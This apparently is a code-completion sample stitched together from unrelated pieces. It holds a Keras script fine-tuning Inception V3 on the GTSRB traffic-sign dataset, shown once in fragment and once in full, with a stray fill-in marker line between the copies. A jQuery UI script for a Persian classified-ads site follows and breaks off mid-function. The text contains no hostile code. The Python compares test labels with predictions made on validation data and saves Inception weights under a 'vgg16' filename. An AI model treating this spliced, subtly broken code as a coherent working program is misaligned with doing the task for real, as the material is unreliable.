branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 32, 1, 1)
x = merge([branch1x1, branch5x5, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(i))
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
def lr_schedule(epoch): # function that takes an epoch index as input and returns a new learning rate as output
return lr*(0.1**int(epoch/10))
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
y_pred= model.predict_classes(X_valid)
print("Predictions: ", y_pred)
model.metrics_names
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!")
| self.acc.append(logs.get('acc')) | identifier_body |
fine_tune_Inception.py |
# Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def on_epoch_end(self, batch, logs={}):
self.acc.append(logs.get('acc'))
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
|
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
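    # This 1000-way head mirrors the original ImageNet classifier; it exists only so the pre-trained weight file below loads without a shape mismatch.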
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
def lr_schedule(epoch): # function that takes an epoch index as input and returns a new learning rate as output
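    # Drops the learning rate by a factor of 10 every 10 epochs, e.g. epochs 0-9 train at lr, 10-19 at lr/10, 20-29 at lr/100.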
return lr*(0.1**int(epoch/10))
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
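    # GTSRB (German Traffic Sign Recognition Benchmark) defines 43 traffic-sign classes.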
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
    y_pred = np.argmax(model.predict(X_valid), axis=1)  # the functional-API Model has no predict_classes(); take the argmax of the class probabilities instead
print("Predictions: ", y_pred)
    print("Metric names: ", model.metrics_names)  # labels for the values returned by evaluate() below
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!")
custom.js |
//////////////////////////////////////////////////////////////////////////////////
$(document).ready(function(){
//IE
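	// Older IE builds do not style HTML5 sectioning elements reliably, so swap them for classed <div>s before any other setup runs.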
isIE = /*@cc_on!@*/false || !!document.documentMode;
if (isIE) {
$( 'header, footer, main, aside' ).each(function(){
$(this).replaceWith( '<div class="ie-' + $(this).prop("tagName").toLowerCase() + '">' + $( this ).html() + "</div>" );
})
$('.ie-main').addClass('clearfix')
}
//header
//header - searchbox
$('#headertools button[name=search]').click(function(){
$('input.topbarSearch').focus();
})
$('input.topbarSearch').focus(function(){
$('#headertools button[name=search]').hide();
$('#headertools button[name=close]').show();
$('#topbar .title').hide()
});
$('input.topbarSearch').focusout(function(){
$('#headertools button[name=search]').show();
$('#headertools button[name=close]').hide();
setTimeout(function(){
$('#topbar .title').fadeIn()
},500);
});
// slider
if ($('.slider').length) {
sliderBuild();
sliderRoll(1);
}
//order
changeOrder()
	//pop menu
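	// Clicking a .popmenu activates it; the document-level click handler below closes any open menu when the click lands outside it.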
$('.popmenu').not('.popmenu.active').click(function(){
$('.popmenu').removeClass('active');
$(this).addClass('active');
})
$(document).on('click', function (e) {
if ($('.popmenu.active').length && $(e.target).closest('.popmenu.active').length === 0) {
$('.popmenu').removeClass('active');
}
});
// hash links
if (window.location.hash.length) {
setTimeout(function () {
aHash(window.location.hash)
}, 1000);
}else {
setTimeout(function () {
aHash()
}, 1000);
}
$("a[href^=#]").click(function( e ) {
e.preventDefault();
aHash($(this).attr('href'))
})
function aHash(hash) {
if (hash) {
hash = hash
}else{
hash = $('.director a[href^=#]').attr('href')
}
if (hash && hash.length> 1) {
console.log(hash);
$("a[href^=#]").removeClass('active');
$('a[href=' + hash + ']').addClass('active');
window.location.hash = hash;
$('main > *.active').removeClass('active');
var hash = $(hash).get(0)
$(hash).addClass('active');
}
}
//click Effect
$('.cfx').click(function(e){
var elm = $(this);
var width = ($(this).width() * 1.5)
var xPos = Math.floor(e.pageX - elm.offset().left);
var yPos = Math.floor(e.pageY - elm.offset().top);
pob = ~~(Math.random() * 10000)
$(this).append('<div id="bubble' + pob + '" class="bubbleWrap"></div>');
$('#bubble' + pob).append('<div class="bubble"></div>');
$('#bubble' + pob + ' .bubble').css({
'left': xPos - (width / 2),
'top': yPos - (width / 2),
'width': width,
'height': width,
'-webkit-transform' : 'scale(0)',
'-moz-transform' : 'scale(0)',
'-ms-transform' : 'scale(0)',
'-o-transform' : 'scale(0)',
'transform' : 'scale(0)'
})
setTimeout(function () {
$('#bubble' + pob + ' .bubble').addClass('active')
}, 100);
setTimeout(function(){
// $('#bubble' + pob).remove()
},1000)
});
// box scroll fix
$('.scrlfix').bind('mousewheel DOMMouseScroll', function(e) {
var scrollTo = null;
if (e.type == 'mousewheel') {
scrollTo = (e.originalEvent.wheelDelta * -.1);
}
else if (e.type == 'DOMMouseScroll') {
scrollTo = .1 * e.originalEvent.detail;
}
if (scrollTo) {
e.preventDefault();
$(this).scrollTop(scrollTo + $(this).scrollTop());
}
});
	//Mobile Mode
if (window.innerWidth < 721) {mobileModeStart()};
	if (window.innerWidth > 720) {mobileModeEnd()};
$(document).on('click', '#showmenu', function() {
$("#menu , #hidemenu").addClass("active");
$(this).removeClass("active");
$("#menu").offset({left: 0});
$("nav, #headertools").addClass("menu");
$('#topbar').append('<div id="dimmer"></div>');
$('html').css({'overflow':'hidden'});
$('body').append('<div id="menucover"></div>');
setTimeout(function () {
$('#dimmer').addClass('active');
$('#menucover').addClass('active');
}, 500);
})
$(document).on('click', '#dimmer ', function() {
$("#menu").removeClass("active");
$("#menu").offset({left: -250});
$("nav, #headertools").removeClass("menu");
$('html').css({'overflow':'auto'});
$("#showmenu").addClass("active");
$('#hidemenu').removeClass("active");
$(this).remove();
$('#menucover').remove();
});
$(document).on('click', '#hidemenu ', function() {
$("#dimmer").click();
});
// bazaar page
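	// Clicking anywhere on an ad card except its buttons follows the card's link.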
$('#ads .ad section').click(function(e){
if (e.target.nodeName != 'BUTTON') {
var target = $(this).closest('section').children('a').attr('href')
window.location.href = target
}
});
// bazaar page - filter bar
$('#filterbar button[name=list]').click(function(){
$('#filterbar button[name=grid]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
})
$('#filterbar button[name=grid]').click(function(){
$('#filterbar button[name=list]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
})
$('#filterbar button[name=filters]').click(function(){
$(this).toggleClass('active');
$('#filters').toggleClass('active');
})
$('#filterbar button[name=sort]').click(function(){
$(this).toggleClass('active');
$('#sort').toggleClass('active');
})
$('#sort, #filters').children('button[name=close]').click(function(){
var name = $(this).closest('section').attr('id');
$('#filterbar button[name=' + name + ']').click();
})
//ad page
$('#adGalleryList .thumbnail').click(function(){
$('#adGalleryList .thumbnail').removeClass('active');
$(this).addClass('active');
var src = $(this).attr('imgsrc')
$('#adGallerySelected').css({'background':'url(' + src + ')'})
})
// bookmark button
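	// Placeholder: bookmarking is not wired up yet, the handler only raises a test alert.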
$('button[name=bookmark]').click(function(){
alert('Bookmark Test')
})
//forms
$('input[name=resetpassword]').click(function(){
$('#password-reset').show()
$(this).hide()
})
// image selectors
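	// Previews a newly chosen file by reading it as a data URL and painting it as the background of the element named in the input's "t" attribute.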
$(document).on('change', 'input[type=file]', function() {
if (this.files && this.files[0]) {
var target = '.' + $(this).attr('t')
var reader = new FileReader();
reader.onload = function (e) {
$(target).css({'background': 'url(' + e.target.result + ')'}).show();
};
reader.readAsDataURL(this.files[0]);
}
})
//image add
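	// Each click adds a hidden file input plus a preview slot and opens the file picker; at most four pictures per ad are allowed.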
imgNum = $('.box.pics div').length + 1;
$('input[name=addPicture]').click(function(){
if (imgNum < 5) {
var fieldset = $(this).closest('fieldset').get(0)
var box = $(fieldset).children('.box')
$(fieldset).append('<input type="file" name="adp-' + imgNum + '" accept="image/*" t="adp-' + imgNum + '" >')
$(box).removeClass('hidden').append('<div style="display:none;" class="adp-' + imgNum + '"><i ></i></div>')
$('input[name=adp-' + imgNum + ']').click();
imgNum = imgNum + 1;
}else{
alert('شما حداکثر مجاز به انتخاب چهار تصویر برای هر آگهی هستید!')
}
})
// image remove
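	// Removing a preview also removes its file input, then renumbers the remaining ones so the adp-1..adp-n names stay consecutive.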
$(document).on('click', '.box > div ', function() {
$(this).remove()
$('input[name=' + $(this).attr('class') + ']').remove();
imgNum = imgNum - 1;
$('input[name=addPicture]').prop('disabled', false);
//
var input = $('body input[name^=adp]');
for (var i = 0; i < input.length; i++) {
var element = input[i]
$(element).attr('name', 'adp-' + (i+1)).attr('t' , 'adp-' + (i+1))
}
var image = $('body .box.pics div');
for (var i = 0; i < image.length; i++) {
var element = image[i]
$(element).attr('class' , 'adp-' + (i+1))
}
});
});
//////////////////////////////////////////////////////////////////////////////////
$(window).resize(function(){
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
if ($('.slider').length) {
sliderResize()
}
changeOrder()
});
//////////////////////////////////////////////////////////////////////////////////
menu = false
//Mobile mode
function mobileModeStart() {
if (menu !== true && $('body.msg').length < 1) {
mobileMenuBuild();
listHorizontaller()
filterbarMobile()
}
}
function mobileModeEnd() {
if (menu) {
mobileMenuremover();
listVerticaller()
filterbarNormal()
}
}
function mobileMenuBuild() {
$('#headertools').wrap( '<div class="clearfix" id="menu"></div>' );
$('nav, #footersitemap, #footersocials').appendTo('#menu');
$('body').append('<button id="showmenu" title="منو" type="button" class="icon cfx active" name="menu"></button>');
$('body').append('<button id="hidemenu" title="بستن" type="button" class="icon cfx" name="menu"></button>');
menu = true;
}
function mobileMenuremover() {
$('nav, #headertools').unwrap();
$('#showmenu, #hidemenu').remove();
if (isIE) {
$('#footersitemap, #footersocials').appendTo('.ie-footer');
}else {
$('#footersitemap, #footersocials').appendTo('footer');
}
menu = false;
}
function listHorizontaller() {
$('#popularbazaar ul, #newbazaar ul').wrap( '<div class="wrap"></div>' );
$( "#popularbazaar .wrap, #newbazaar .wrap" ).each(function(){
$(this).scrollLeft($(this).children('ul').width())
})
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).width($(this).children('li').length * 155);
})
}
function listVerticaller() {
$( "#popularbazaar ul, #newbazaar ul" ).unwrap()
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).css({'width':'auto'});
})
}
function filterbarMobile() {
$('#filterbar button[name=grid]').removeClass('active');
$('#filterbar button[name=list]').addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
}
function filterbarNormal() {
$('#filterbar button[name=list]').removeClass('active');
$('#filterbar button[name=grid]').addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
}
// slider
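// sliderBuild() adds one handle dot per slide plus next/prev labels; sliderRoll() scrolls the slide list to the requested slide and schedules an automatic advance every 10 seconds.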
function sliderBuild() {
numOfSlides = $('.slides .slide').length
$('.slider').append('<ul class="handle"></ul>')
for (var i = 1; i < numOfSlides + 1; i++) {
$('.slider .handle').append('<li class="sl' + i + '"></li>')
}
$('.slider').append('<div class="slh handle-next">Next</div><div class="slh handle-prev">Prev</div>')
$('.sl1').addClass('active');
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
}
function sliderResize() {
setTimeout(function () {
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
var num = parseInt($('.handle li.active').attr('class').split("sl")[1])
if (num === numOfSlides) {
num = 1
}
clearTimeout(timer);
$('.slider .handle li').removeClass('active');
$('.slider .sl' + num).addClass('active');
sliderRoll(num)
}, 700);
}
function sliderRoll(num) {
var move = (num - 1) * $('.slide')[0].getBoundingClientRect().height
$('.slides').animate({scrollTop : move},'1000')
$('.slider .handle li').removeClass('next').html('');
$('.slider .handle li').removeClass('prev').html('');
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
$('.slider .handle li.sl' + (num - 1)).addClass('prev').html('');
timer = setTimeout(function(){
if (num === numOfSlides) {
num = 0
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
}
$('.slider .sl' + (num + 1)).click()
},10000);
num + 1
}
$(document).on('click', '.slider .handle li', function() {
clearTimeout(timer);
